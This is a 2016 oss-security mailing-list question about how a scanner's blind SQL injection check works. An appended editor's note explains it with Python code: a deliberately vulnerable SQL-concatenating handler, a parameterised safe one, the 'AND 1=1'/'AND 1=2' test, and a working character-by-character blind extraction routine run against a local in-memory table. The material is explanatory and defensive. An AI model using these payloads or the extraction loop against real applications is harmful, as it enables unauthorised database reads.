Date: Wed, 1 Jun 2016 14:15:41 +0300
From: Mihamina RAKOTOMANDIMBY <mihamina-rakotomandimby@...mb.org>
To: oss-security@...ts.openwall.com
Subject: "The Blind SQL Injection Issue" explanation

Hi members,

A web application of mine has been scanned by a "security tool".
It reports some issues about a "Blind SQL Injection Issue".

The test result seems to indicate a vulnerability
because it shows that values can be appended to parameter
values, indicating that they were embedded in an SQL
query. In this test, three (or sometimes four)
requests are sent. The last is logically equal to the original,
and the next-to-last is different. Any others are for control
purposes. A comparison of the last two responses with the first
(the last is similar to it, and the next-to-last is different)
indicates that the application is vulnerable.

This message is widely used on the internet: https://goo.gl/Gtqkbk

My problem is I cannot figure out how this could work.

Let's suppose the web app is vulnerable, the reasoning of this test is:

- req. 1 gets resp. 1 and changed database state to state 1
- req. 2 gets resp. 2 and changed database state to state "whatever"
- req. 3 gets resp. 1 and changed database state to state "whatever"

My questions are:
- How could database state "whatever" give the same response as
  "state 1"? (a.k.a. "resp. 1")
- As a "blind" one (mostly random input then), how could these
  assertions work?

Would you please help me to figure out how this works?
I have a basic security level, and maths are far away in the past ;-)

Thank you in advance.
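Editor's note, as an added example that is not part of the message above or of any scanner's code: the three-request check the scanner describes is a boolean-based blind test, and it does not depend on database state at all. All three requests are read-only; what the scanner compares is the application's response when an always-false condition (`AND 1=2`) and an always-true condition (`AND 1=1`) are appended to the parameter. If the parameter is concatenated into the SQL text, the true condition leaves the query logically unchanged (same page as the original) while the false condition empties the result (different page). If the parameter is bound as data, both appended strings are just an invalid value and the pattern does not appear. The block below models that with a hypothetical `vulnerable_lookup` / `safe_lookup` handler pair over a constructed in-memory SQLite table, runs the scanner's comparison against both, and then shows why the "blind" label is no comfort: the same true/false oracle can read arbitrary strings out of the database one character at a time. The stability control (repeating the original request) is one common control; the post does not say what the scanner's own control requests are.

```python
import sqlite3

# Constructed sample data: a tiny in-memory "product catalogue" standing in
# for the web application's database. Not from the original post.
def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "widget"), (2, "gadget"), (3, "gizmo")])
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, product_id: str) -> str:
    """Hypothetical /product?id=... handler that concatenates the parameter
    into the SQL text. Whatever is appended to the parameter becomes SQL."""
    sql = "SELECT name FROM products WHERE id = " + product_id
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return "Internal error"        # syntax errors are hidden from the client
    return rows[0][0] if rows else "No such product"


def safe_lookup(conn: sqlite3.Connection, product_id: str) -> str:
    """Same handler with a bound parameter: the value can only ever be data."""
    try:
        pid = int(product_id)
    except ValueError:
        return "No such product"
    rows = conn.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchall()
    return rows[0][0] if rows else "No such product"


def boolean_blind_test(lookup, base_value: str) -> bool:
    """The scanner's three-request check. Only SELECTs are issued, so no
    database state changes between requests; only responses are compared."""
    resp_original = lookup(base_value)
    # Control (assumed, one common choice): repeating the original request must
    # give the same page, otherwise the comparison below means nothing.
    if lookup(base_value) != resp_original:
        return False
    resp_false = lookup(base_value + " AND 1=2")  # next-to-last: always false
    resp_true = lookup(base_value + " AND 1=1")   # last: logically equal to original
    return resp_true == resp_original and resp_false != resp_original


def blind_extract(lookup, base_value: str, subquery: str, max_len: int = 32) -> str:
    """Once the true/false oracle exists, read any string out of the database
    one character at a time by binary search (SQLite length/substr/unicode)."""
    baseline = lookup(base_value)

    def oracle(cond: str) -> bool:
        return lookup(f"{base_value} AND ({cond})") == baseline

    def search(expr: str, hi: int) -> int:
        lo = 0                       # find the integer value of expr in [0, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(f"length(({subquery}))", max_len)
    return "".join(chr(search(f"unicode(substr(({subquery}), {i}, 1))", 127))
                   for i in range(1, length + 1))


def demo() -> dict:
    """Run the scanner's check against both handlers and read the table name blind."""
    conn = build_db()
    vuln = lambda v: vulnerable_lookup(conn, v)
    safe = lambda v: safe_lookup(conn, v)
    return {
        "vulnerable_flagged": boolean_blind_test(vuln, "2"),
        "safe_flagged": boolean_blind_test(safe, "2"),
        "table_name": blind_extract(vuln, "2",
                                    "SELECT name FROM sqlite_master WHERE type='table'"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against the concatenating handler the original request `id=2` returns "gadget", `id=2 AND 1=2` returns "No such product" and `id=2 AND 1=1` returns "gadget" again, which is exactly the "last equals first, next-to-last differs" pattern. Against the parameterised handler both appended values fail to parse as an integer, so the true-condition request no longer matches the original and the test reports nothing. The extraction step needs no error messages and no output of the injected data at all, only the yes/no difference between two pages, which is what "blind" means here.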
